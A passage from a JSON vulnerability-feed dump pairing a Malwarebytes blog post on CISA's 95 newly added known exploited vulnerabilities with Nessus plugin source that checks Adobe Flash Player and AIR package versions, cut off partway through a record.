As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.\n\nThe best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.", "cvss3": {}, "published": "2017-08-08T14:00:40", "title": "APT Trends report Q2 2017", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "modified": "2017-08-08T14:00:40", "href": "https://securelist.com/apt-trends-report-q2-2017/79332/", "id": "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2022-03-14T11:27:50", "description": "On Friday March 3, the Cybersecurity and Infrastructure Security Agency (CISA) added a whopping number of 95 new known exploited vulnerabilities to its Known Exploited Vulnerabilities Catalog.\n\nThis catalog provides Federal Civilian Executive Branch (FCEB) agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nBut even if your organization isn't a FCEB agency that needs to follow the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list can act as a good guide for 
your [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>) strategy.\n\n## 95 new ones?\n\nCISA normally sends out a mail every few days in which it details a few important vulnerabilities it's added to the Catalog. However, on March 3 it didn\u2019t even enumerate the list. Instead, it just emailed a [link to the Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and included instructions on how to find the most recently added vulnerabilities. If you're looking yourself, you need to click on the arrow on the "Date Added to Catalog" column, which will sort by descending dates.\n\n## Not so new\n\nThe first thing that jumped out at me is that these vulnerabilities were not all very new. The oldest vulnerability on that list is [CVE-**2002**-0367](<https://nvd.nist.gov/vuln/detail/CVE-2002-0367>), an almost 20-year-old vulnerability in Windows NT and Windows 2000. In fact, only 5 vulnerabilities were patched in 2022. All these applied to Cisco\u2019s Small Business RV160, RV260, RV340, and RV345 series routers by the way.\n\nThis brings me to the next thing that is remarkable. 38 of the 95 added vulnerabilities are for [Cisco products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-cisco-fixes-several-vulnerabilities/>). Other products include those by Microsoft (27), Adobe (16), and Oracle (7).\n\nOf the Adobe vulnerabilities, nine were found in Flash Player. Adobe Flash Player reached End of Life (EOL) on December 31, 2020, after being first announced in 2017. Since Adobe no longer supports Flash Player, on January 12, 2021, the company started blocking Flash content from running. 
In fact, [Adobe strongly recommends](<https://www.adobe.com/nl/products/flashplayer/end-of-life.html>) all users immediately uninstall Flash Player to help protect their systems.\n\n## Possible reasons\n\nPondering the reason for CISA to suddenly add 95 vulnerabilities to their list, I came up with the following options:\n\n * It suddenly became aware of several old vulnerabilities that were nonetheless still being exploited.\n * It suddenly decided to list vulnerabilities in software that has long reached EOL but could still be used a lot.\n * The nature of actively exploited vulnerabilities has changed.\n\n## Some examples\n\nPersonally, I suspect that the nature of the actively exploited vulnerabilities has changed. Last year, you would typically see exploited vulnerabilities that would allow an attacker to breach a network or compromise a system to gain a foothold. This allows attackers to exfiltrate data, plant ransomware, and other criminal activities that could lead to financial gain.\n\nHowever, looking at some of the vulnerabilities that were included in this list of 95, I noticed that many could lead to Denial-of-Service (DoS) attacks.\n\nExamples:\n\n * A [vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2016-8562>) in Siemens SIMATIC CP 1543-1 versions before 2.0.28 allows remotely authenticated users to cause a denial of service by modifying SNMP variables.\n * Multiple Cisco vulnerabilities on this list which could result in a DoS condition or cause an affected system to reload.\n\nOther vulnerabilities could allow attackers to run arbitrary code or cause a denial of service. 
For example, a [PowerPoint](<https://nvd.nist.gov/vuln/detail/CVE-2015-2424>) vulnerability that has been around since 2015 and was found to be used by the Russian state-sponsored team APT28 (aka Fancy Bear) in 2018.\n\nSome [Flash Player vulnerabilities](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) were found to be used in targeted attacks. The suspect in this case was APT37, also known as the North Korean \u201cLazarus\u201d group.\n\nA vulnerability in older Windows versions (Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1) would allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document. The use of this exploit was [attributed](<https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html>) to the Russian \u201cSANDWORM\u201d operation.\n\nI also found an Elevation of Privilege (EoP) [vulnerability in a Windows Installer](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>) on the CISA list that would allow an attacker to delete targeted files on a system. However, they would NOT gain privileges to view or modify file contents.\n\nOther interesting items on the list are some [IoT](<https://blog.malwarebytes.com/glossary/iot/>) vulnerabilities that got some fame in 2020 under the name [Ripple20](<https://www.jsof-tech.com/disclosures/ripple20/>). Successful exploitation of these vulnerabilities could result in denial of service, information disclosure or remote code execution.\n\nSo, is it just me or is there a trend here that shows vulnerabilities that were previously hard to exploit for financial gain, but are perfectly usable to disrupt operations? 
Could it be that, no surprise, the war in Ukraine has changed the nature of the actively exploited vulnerabilities?\n\nAccording to Adam Kujawa, Security Evangelist and Director of Malwarebytes' Threat Intel team:\n\n> "In 2007, we observed Russian sympathizers online utilizing hacking tools to launch disruption attacks against Georgian news networks and government networks, to prevent information from flowing to the public while Russia had troops roll in. Similar events have happened in Estonia, and Russian sponsored hackers are known to utilize Ukrainian networks as a kind of \u201cplayground\u201d for their attacks, shutting off power grids and other critical infrastructure, launching massive supply chain attacks against them (as in the case of NotPetya). And those are just some of the attacks we know about.\n\n> With that in mind, I believe that while many of these vulnerabilities are useless against actual intrusion and espionage, the exploits developed from them will be used to disrupt and degrade rather than collect.\n\n> I am not sure how many of these have been used in the wild, and while it is great to see CISA be proactive in spreading this information, I must wonder how much of the information will get to those protecting networks in Ukraine? Could it be that CISA may have just handed over the knowledge about various disruptive exploits that will work on unpatched systems, to be used against those who don\u2019t have endpoint patching as their top priority?"\n\n## Mitigation\n\nGiven the varied nature of the list, the most actionable advice is to keep an eye on the known exploited vulnerabilities catalog. To make things easier, you can [subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_136>) to receive the updates. 
Besides the [usual security advice](<https://blog.malwarebytes.com/awareness/2022/03/four-smb-cybersecurity-practices-during-geopolitical-upheaval/>), now seems to be a good time to invest in clever [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>), and ditch that software which has reached EOL and no longer receives security updates.\n\nStay safe, everyone!\n\nThe post [CISA list of 95 new known exploited vulnerabilities raises questions](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-03-14T11:18:33", "type": "malwarebytes", "title": "CISA list of 95 new known exploited vulnerabilities raises questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0367", "CVE-2014-4114", "CVE-2015-2424", "CVE-2016-4117", "CVE-2016-8562", "CVE-2021-41379"], "modified": "2022-03-14T11:18:33", "id": "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5", 
"href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-05-18T15:28:04", "description": "The remote host is affected by the vulnerability described in GLSA-201606-08 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201606-08.NASL", "href": "https://www.tenable.com/plugins/nessus/91702", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201606-08.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91702);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2016-1019\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\",\n \"CVE-2016-4171\"\n );\n script_xref(name:\"GLSA\", value:\"201606-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201606-08\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201606-08\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose 'www-plugins/adobe-flash-11.2.202.626'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.626\"), vulnerable:make_list(\"lt 11.2.202.626\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:13:45", "description": "This security update for flash-player to 11.2.202.621 fixes the following issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. 
(APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-585.NASL", "href": "https://www.tenable.com/plugins/nessus/91178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-585.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91178);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-585)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This security update for flash-player to 11.2.202.621 fixes the\nfollowing issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and\nChrome OS. Successful exploitation could cause a crash and potentially\nallow an attacker to take control of the affected system. 
(APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.621-2.97.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:13:45", "description": "The version of Adobe AIR installed on the remote Windows host is prior or equal to version 21.0.0.198. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. 
(CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe AIR <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91162", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91162);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Windows host is prior\nor equal to version 21.0.0.198. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. 
